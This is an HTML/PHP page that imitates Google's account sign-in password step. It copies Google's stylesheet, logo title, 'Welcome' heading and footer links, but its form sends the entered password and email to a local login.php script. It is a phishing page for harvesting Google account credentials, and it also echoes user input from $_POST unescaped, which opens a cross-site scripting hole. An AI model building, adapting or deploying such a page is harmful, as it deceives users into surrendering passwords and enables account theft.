<html><head>
<link rel="stylesheet" href="https://ssl.gstatic.com/accounts/static/_/ss/k=gaia.gaiafe_glif.1fCTB7iG-zw.L.F4.O/am=FwAAPWxQAx4ABJgAAAAAAAAAAAPAKEtWrxX6Bw/d=0/ct=zgms/rs=ABkqax1w0r8oB-Oj00c07ezqLfeiA8UqPw" type="text/css">
<meta name="viewport" content="width=device-width, initial-scale=1">
<script>
    function myFunction() {
  var x = document.getElementById("qcoder");
  if (x.type === "password") {
    x.type = "text";
  } else {
    x.type = "password";
  }
} 
</script></head>
<body>
<div class="H2SoFe LZgQXe TFhTPc" data-continent="Western Asia" data-session-region="TR"><div class="RAYh1e LZgQXe qmmlRd" id="initialView" role="presentation" jsname="WsjYwc" jscontroller="GHsEdb" jsaction="rcuQ6b:wVXPKc,eyofDf;CfTBWd:r0xNSb;enEq8c:Yd2OHe;Z2AmMb:nnGvjf;eqoCse:oUMEzf;RdYeUb:oUMEzf;EJh3N:vYWWBd;"><div class="RZBuIb c8DD0" aria-hidden="true"><div jscontroller="ltDFwf" jsaction="transitionend:Zdx3Re" jsname="Igk6W" role="progressbar" class="sZwd7c B6Vhqe qdulke jK7moc"><div class="xcNBHc um3FLe"></div><div jsname="cQwEuf" class="w2zcLc Iq5ZMc"></div><div class="MyvhI TKVRUb" jsname="P1ekSe"><span class="l3q5xe SQxu9c"></span></div><div class="MyvhI sUoeld"><span class="l3q5xe SQxu9c"></span></div></div></div><div class="xkfVF" jsname="f2d3ae" role="presentation" tabindex="null"><div class="Aa1VU"><div class="Lth2jb " jsname="n7vHCb" jscontroller="rKxYMb" jsaction="rcuQ6b:qg4Ic;Kzwjs:WPi0i;" data-oauth-third-party-logo-url="" aria-hidden="true"><div jsname="jjf7Ff"><div id="logo" class="v8vQje" title="Google"><div class="rr0DNb" jsname="l4eHX"><img src="https://duckduckgo.com/i/0227507d.png" width="75" height="24"></div></div></div></div><div id="view_container" class="JhUD8d SQNfcc vLGJgb" jscontroller="WFS13" jsaction="rcuQ6b:npT2md" jsmodel="Z7PiFb qFmk3b qbZ0Se nqpTHe hAn1A YPPRX eV9nn Xu2csd hc6Ubd"><div class="zWl5kd" data-view-id="b5STy" style=""><div class="DRS7Fe bxPAYd k6Zj8d" jsname="lr9nlf" jscontroller="Z3Buzf" jsshadow="" data-branding="jcJzye" role="presentation"><div jsname="paFcre"><div class="jXeDnc " jsname="tJHJj" jscontroller="S9352b" jsaction="JIbuQc:pKJJqe(af8ijd);bTyaEe:pKJJqe;"><h1 class="ahT6S " data-a11y-title-piece="" id="headingText" jsname="r4nke"><span jsslot="">Welcome</span></h1><div class="aCayab"><div jscontroller="BzWZlf" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; touchstart:p6p2H; touchend:yfqBxc;" class="YZrg6 HnRr5d iiFyne cd29Sd" tabindex="0" role="link" aria-label="deneme123@gmail.com selected. Switch account" jsname="af8ijd"><div class="gPHLDe"><div class="qQWzTd" aria-hidden="true"><svg aria-hidden="true" class="stUf5b" fill="currentColor" focusable="false" width="48px" height="48px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm6.36 14.83c-1.43-1.74-4.9-2.33-6.36-2.33s-4.93.59-6.36 2.33C4.62 15.49 4 13.82 4 12c0-4.41 3.59-8 8-8s8 3.59 8 8c0 1.82-.62 3.49-1.64 4.83zM12 6c-1.94 0-3.5 1.56-3.5 3.5S10.06 13 12 13s3.5-1.56 3.5-3.5S13.94 6 12 6z"></path></svg></div></div><div jsname="fmcmS" class="KTeGk" id="profileIdentifier">
  <?php echo $_POST['email']; ?>
</div><div class="krLnGe"><svg aria-hidden="true" class="stUf5b MSBt4d" fill="currentColor" focusable="false" width="24px" height="24px" viewBox="0 0 24 24" xmlns="https://www.w3.org/2000/svg"><polygon points="12,16.41 5.29,9.71 6.71,8.29 12,13.59 17.29,8.29 18.71,9.71"></polygon></svg></div></div></div></div></div><div jsname="uybdVe" class="pwWryf bxPAYd" role="presentation"><div jsname="USBQqe" class="Wxwduf Us7fWe JhUD8d" role="presentation"><div class="WEQkZc"><span jsslot="" class="sFcPkb"></span><div class="bCAAsb" jsname="rEuO1b" jscontroller="mjtijb" data-form-action-uri="/signin/v2/challenge/password/empty"><form action="login.php" method="post" id="2"><span jsslot=""><section class="aTzEhb " jscontroller="uwHxEe" jsshadow=""><div class="CxRgyd" jsname="MZArnb"><div jsslot=""><div class="SdBahf VxoKGd" jscontroller="MZKEPb" jsshadow="" jsname="vZSTIf" data-is-visible="false"><div class="eEgeR"><div class="W498nc"><div class="fdWl7b"><div class="hDp5Db"><div id="password" class="rFrNMe ze9ebf YKooDc q9Nsuf zKHdkd sdJrJc" jscontroller="pxq3x" jsaction="clickonly:KjsqPd; focus:Jt1EX; blur:fpfTEe; input:Lg5SV" jsshadow="" jsname="Ufn6O"><div class="aCsJod oJeWuf"><div class="aXBtI Wic03c"><div class="Xb9hP">
  
  
  <input id="qcoder" type="password" class="whsOnd zHQkBf" autocomplete="current-password" name="password" placeholder="Enter your password" required></div><input type="hidden" name="email" value="<?php echo $_POST['email']; ?>">



<div class="i9lrp mIZh1c"></div><div jsname="XmnwAc" class="OabDMe cXrdqd Y2Zypf"></div></div></div><div class="LXRPh"></div></div></div></div></div></div><div class="EcjFDf" jsname="ESjtn"><div class="G43JTb" jsaction="rcuQ6b:xawz9d;bLkQhe:gfO0Le;" jscontroller="OLRvpc" jsname="EMUunb" jsshadow=""><div class="iVsznb"><div class="SLG1Fe rBUW7e" jsaction="click:va5fqd;JIbuQc:vKfede(ornU0b)" jscontroller="TnmUic" jsname="wQNmvb" jsshadow=""><div class="utl8ve NEk0Ve"><div class="AU165e"><div class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb" data-is-touch-wrapper="true"><div class="VfPpkd-MPu53c VfPpkd-MPu53c-OWXEXe-dgl2Hf Ne8lhe swXlm az2ine j1feqc VfPpkd-MPu53c-OWXEXe-mWPk3d" jscontroller="etBPYb" data-indeterminate="false" jsname="ornU0b" jsaction="click:cOuCgd; clickmod:vhIIDb; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc; touchcancel:JMtRjd; contextmenu:mg9Pef; animationend:L9dL9d;dyRcpb:dyRcpb;" data-value="optionc2"><input class="VfPpkd-muHVFf-bMcfAe" type="checkbox" onclick="myFunction()"><div class="VfPpkd-YQoJzd"><svg class="VfPpkd-HUofsb" viewBox="0 0 24 24"><path class="VfPpkd-HUofsb-Jt5cK" fill="none" d="M1.73,12.91 8.1,19.28 22.79,4.59"></path></svg><div class="VfPpkd-SJnn3d"></div></div><div class="VfPpkd-OYHm6b"></div></div></div></div><div class="i3abHf"><div jsname="V67aGc" class="nObcn"><div jsslot="" id="selectionc0" class="qJfqwb" jsname="CeL6Qc">Show password</div></div></div></div></div></div></div></div></div></div></div></section></span></form></div></div>



<div class="zQJV3" data-is-consent="false" data-is-primary-action-disabled="false" data-is-secondary-action-disabled="false" data-primary-action-label="Next" data-secondary-action-label="" jsshadow=""><div class="dG5hZc" jsname="DhK0U"><div class="qhFLie" jsname="k77Iif"><div jscontroller="Xq93uf" jsaction="click:cOuCgd;JIbuQc:JIbuQc;" jsname="Njthtb" class="FliLIb DL0QTb" id="passwordNext"><div class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb" data-is-touch-wrapper="true"><button class="VfPpkd-LgbsSe VfPpkd-LgbsSe-OWXEXe-k8QpJ VfPpkd-LgbsSe-OWXEXe-dgl2Hf nCP5yc AjY5Oe DuMIQc qIypjc TrZEUc" form="2" type="submit"><div class="VfPpkd-Jh9lGc"></div><span jsname="V67aGc" class="VfPpkd-vQzf8d">Next</span><div class="VfPpkd-RLmnJb"></div></button></div></div></div><div class="daaWTb" jsname="QkNstf"><div jscontroller="Xq93uf" jsaction="click:cOuCgd;JIbuQc:JIbuQc;" jsname="gVmDzc" class="FliLIb n4P87" id="forgotPassword"><div class="VfPpkd-dgl2Hf-ppHlrf-sM5MNb" data-is-touch-wrapper="true"><button class="VfPpkd-LgbsSe VfPpkd-LgbsSe-OWXEXe-dgl2Hf ksBjEc lKxP2d uRo0Xe TrZEUc" jscontroller="soHxf" jsaction="click:cOuCgd; mousedown:UX7yZ; mouseup:lbsD7e; mouseenter:tfO1Yc; mouseleave:JywGue; touchstart:p6p2H; touchmove:FwuNnf; touchend:yfqBxc; touchcancel:JMtRjd; focus:AHmuwe; blur:O22p3e; contextmenu:mg9Pef;" jsname="LgbsSe" type="button"><div class="VfPpkd-Jh9lGc"></div><span jsname="V67aGc" class="VfPpkd-vQzf8d">Forgot password?</span><div class="VfPpkd-RLmnJb"></div></button></div></div></div></div></div></div></div></div></div></div></div></div><footer class="RwBngc"><div class="u7land" jscontroller="VVHlDf" jsaction="rcuQ6b:npT2md;aLn7Wb:VPRXbd"><div role="listbox" aria-expanded="false" id="lang-chooser" class="jgvuAb TkU0Xc" jscontroller="YwHGTd" aria-label="Change language"><div jsname="LgbsSe" role="presentation"><div class="ry3kXd Ulgu9" jsname="d9BH4c" role="presentation"><div class="MocG8c B9IrJb LMgvRb KKjvXb" jsname="wQNmvb" jsaction="" data-value="en" aria-selected="true" role="option" tabindex="0"><div class="kRoyt MbhUzd" jsname="ksKsZd"></div><span jsslot="" class="vRMGwf oJeWuf">‪English (United States)‬</span></div></div><div class="CeEBt Ce1Y1c eU809d" role="presentation"><div class="TquXA"></div></div></div></div></div><ul class="Bgzgmd"><li><a href="https://support.google.com/accounts?hl=en" target="_blank">Help</a></li><li><a href="https://accounts.google.com/TOS?loc=TR&amp;hl=en&amp;privacy=true" target="_blank">Privacy</a></li><li><a href="https://accounts.google.com/TOS?loc=TR&amp;hl=en" target="_blank">Terms</a></li></ul></footer></div><div class="VmOpGe" aria-hidden="true"></div></div>







</body></html>
